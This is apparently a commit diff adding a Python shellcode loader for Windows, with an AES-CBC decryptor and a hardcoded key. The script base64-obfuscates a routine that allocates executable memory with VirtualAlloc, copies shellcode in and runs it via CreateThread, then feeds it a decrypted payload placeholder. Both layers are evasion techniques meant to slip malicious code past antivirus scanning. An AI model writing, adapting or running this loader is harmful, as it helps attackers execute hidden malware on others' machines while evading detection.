|
| 1 | +# coding:utf-8 |
| 2 | +import ctypes |
| 3 | +from Crypto.Cipher import AES |
| 4 | +from binascii import b2a_hex, a2b_hex |
| 5 | +import base64 |
| 6 | +import binascii |
| 7 | + |
| 8 | + |
| 9 | +def CodeLoad(shellcode): |
| 10 | + func = base64.b64decode( |
| 11 | + b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NA0KcHRyID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSksIGN0eXBlcy5jX2ludCgweDMwMDApLGN0eXBlcy5jX2ludCgweDQwKSkNCmJ1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSkNCmN0eXBlcy53aW5kbGwua2VybmVsMzIuUnRsTW92ZU1lbW9yeShjdHlwZXMuY191aW50NjQocHRyKSxidWYsY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSkNCmhhbmRsZSA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuQ3JlYXRlVGhyZWFkKGN0eXBlcy5jX2ludCgwKSxjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfdWludDY0KHB0ciksY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX2ludCgwKSxjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpKQ0KY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLGN0eXBlcy5jX2ludCgtMSkp') |
| 12 | + exec(func) |
| 13 | + |
| 14 | + |
| 15 | +class MData(): |
| 16 | + def __init__(self, data=b"", characterSet='utf-8'): |
| 17 | + # data肯定为bytes |
| 18 | + self.data = data |
| 19 | + self.characterSet = characterSet |
| 20 | + |
| 21 | + def saveData(self, FileName): |
| 22 | + with open(FileName, 'wb') as f: |
| 23 | + f.write(self.data) |
| 24 | + |
| 25 | + def fromString(self, data): |
| 26 | + self.data = data.encode(self.characterSet) |
| 27 | + return self.data |
| 28 | + |
| 29 | + def fromBase64(self, data): |
| 30 | + self.data = base64.b64decode(data.encode(self.characterSet)) |
| 31 | + return self.data |
| 32 | + |
| 33 | + def fromHexStr(self, data): |
| 34 | + self.data = binascii.a2b_hex(data) |
| 35 | + return self.data |
| 36 | + |
| 37 | + def toString(self): |
| 38 | + return self.data.decode(self.characterSet) |
| 39 | + |
| 40 | + def toBase64(self): |
| 41 | + return base64.b64encode(self.data).decode() |
| 42 | + |
| 43 | + def toHexStr(self): |
| 44 | + return binascii.b2a_hex(self.data).decode() |
| 45 | + |
| 46 | + def toBytes(self): |
| 47 | + return self.data |
| 48 | + |
| 49 | + def __str__(self): |
| 50 | + try: |
| 51 | + return self.toString() |
| 52 | + except Exception: |
| 53 | + return self.toBase64() |
| 54 | + |
| 55 | + |
| 56 | +class AEScryptor(): |
| 57 | + def __init__(self, key, mode, iv='', paddingMode="NoPadding", characterSet="utf-8"): |
| 58 | + self.key = key |
| 59 | + self.mode = mode |
| 60 | + self.iv = iv |
| 61 | + self.characterSet = characterSet |
| 62 | + self.paddingMode = paddingMode |
| 63 | + self.data = "" |
| 64 | + |
| 65 | + def __StripZeroPadding(self, data): |
| 66 | + data = data[:-1] |
| 67 | + while len(data) % 16 != 0: |
| 68 | + data = data.rstrip(b'\x00') |
| 69 | + if data[-1] != b"\x00": |
| 70 | + break |
| 71 | + return data |
| 72 | + |
| 73 | + def __PKCS5_7Padding(self, data): |
| 74 | + needSize = 16 - len(data) % 16 |
| 75 | + if needSize == 0: |
| 76 | + needSize = 16 |
| 77 | + return data + needSize.to_bytes(1, 'little') * needSize |
| 78 | + |
| 79 | + def __StripPKCS5_7Padding(self, data): |
| 80 | + paddingSize = data[-1] |
| 81 | + return data.rstrip(paddingSize.to_bytes(1, 'little')) |
| 82 | + |
| 83 | + def __stripPaddingData(self, data): |
| 84 | + if self.paddingMode == "NoPadding": |
| 85 | + return self.__StripZeroPadding(data) |
| 86 | + elif self.paddingMode == "Axx8": |
| 87 | + return self.__StripZeroPadding(data) |
| 88 | + |
| 89 | + elif self.paddingMode == "PKCS5Padding" or self.paddingMode == "PKCS7Padding": |
| 90 | + return self.__StripPKCS5_7Padding(data) |
| 91 | + else: |
| 92 | + pass |
| 93 | + |
| 94 | + def decryptFromBase64(self, entext): |
| 95 | + mData = MData(characterSet=self.characterSet) |
| 96 | + self.data = mData.fromBase64(entext) |
| 97 | + return self.__decrypt() |
| 98 | + |
| 99 | + def __decrypt(self): |
| 100 | + if self.mode == AES.MODE_CBC: |
| 101 | + aes = AES.new(self.key, self.mode, self.iv) |
| 102 | + elif self.mode == AES.MODE_ECB: |
| 103 | + aes = AES.new(self.key, self.mode) |
| 104 | + else: |
| 105 | + pass |
| 106 | + return |
| 107 | + data = aes.decrypt(self.data) |
| 108 | + mData = MData(self.__stripPaddingData(data), characterSet=self.characterSet) |
| 109 | + return mData |
| 110 | + |
| 111 | + |
| 112 | +if __name__ == "__main__": |
| 113 | + key = 'QXh4OEF4eDhBeHg4QXh4OA==' |
| 114 | + iv = 'MDAwMDAwMDAwMDAwMDAwMA==' |
| 115 | + aes = AEScryptor(base64.b64decode(key), AES.MODE_CBC, base64.b64decode(iv), paddingMode="Axx8", characterSet='utf-8') |
| 116 | + |
| 117 | + Data = '密文Shellcode' |
| 118 | + |
| 119 | + Data = aes.decryptFromBase64(Data) |
| 120 | + |
| 121 | + CodeLoad(bytearray(base64.b64decode(Data.data))) |
| 122 | + |
| 123 | + |
| 124 | + |
| 125 | + |
| 126 | + |
| 127 | + |
| 128 | + |
| 129 | + |
| 130 | + |
| 131 | + |
| 132 | + |
| 133 | + |
| 134 | + |
| 135 | + |
| 136 | + |
| 137 | + |
| 138 | + |
0 commit comments